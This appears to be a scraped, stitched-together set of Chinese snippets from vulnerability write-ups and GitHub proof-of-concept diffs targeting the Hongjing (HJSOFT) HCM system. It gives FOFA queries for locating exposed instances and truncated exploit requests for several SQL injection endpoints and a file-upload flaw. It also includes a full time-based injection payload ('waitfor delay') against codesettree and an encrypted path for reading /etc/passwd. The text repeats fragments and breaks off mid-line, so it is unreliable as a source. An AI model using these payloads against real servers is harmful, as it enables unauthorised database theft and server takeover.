宏景HCM 存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。 影响范围 宏景HCM<8.2 漏洞复现 fofa语法:FOFA:body='
宏景HCM fieldsettree 接口处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。 漏洞危害 未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。 参考链接 宏景HCM系统fieldsettree接口存在SQL注入漏洞.md:https://github.com/wy876/POC/...
25 changes: 25 additions & 0 deletions 25 宏景HCM系统infoView处存在sql注入漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,25 @@ ## 宏景HCM系统infoView处存在sql注入漏洞 ## fofa ``` app="HJSOFT-HCM" ``` ## poc ``` GET /templates/attestation/../.....
13 changes: 13 additions & 0 deletions 13 宏景HCM-codesettree接口存在SQL注入漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,13 @@ ## 宏景HCM-codesettree接口存在SQL注入漏洞 ## poc ``` GET /templates/attestation/../../servlet/codesettree?flag=3&codesetid...
漏洞概述 宏景HCM OfficeServer.jsp接口处存在任意文件上传漏洞,未经过身份认证的远程攻击者可利用此漏洞上传任意文件,最终可导致服务器失陷。 漏洞复现 鹰图指纹:app.name="宏景 HCM" fofa语法:app="HJSOFT-HCM" 登录页面如下: POC: POST /w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/Of...
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java -jar HrmsTool.jar -d xxx
漏洞利用成功 其中filepath的加密为读取/etc/passwd: filepath=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP 工具地址:https://github.com/wafinfo/DecryptTools 上一篇宏景HCM pos_dept_post sql注入漏洞 下一篇JeecgBoot-queryFieldBySql-远程命令执行-RCE漏洞 本文作者:pa0fu 本文链接:https:/...
25 changes: 25 additions & 0 deletions 25 宏景HCM系统infoView处存在sql注入漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,25 @@ ## 宏景HCM系统infoView处存在sql注入漏洞 ## fofa ``` app="HJSOFT-HCM" ``` ## poc ``` GET /templates/attestation/../.....
##宏景HCM-codesettree接口存在SQL注入漏洞 ##poc ``` GET /templates/attestation/../../servlet/codesettree?flag=3&codesetid=111';waitfor+delay+'0:0:2'--+&parentid=-1&fromflag=" HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) ...
25 changes: 25 additions & 0 deletions 25 宏景HCM系统infoView处存在sql注入漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,25 @@ ## 宏景HCM系统infoView处存在sql注入漏洞 ## fofa ``` app="HJSOFT-HCM" ``` ## poc ``` GET /templates/attestation/../.....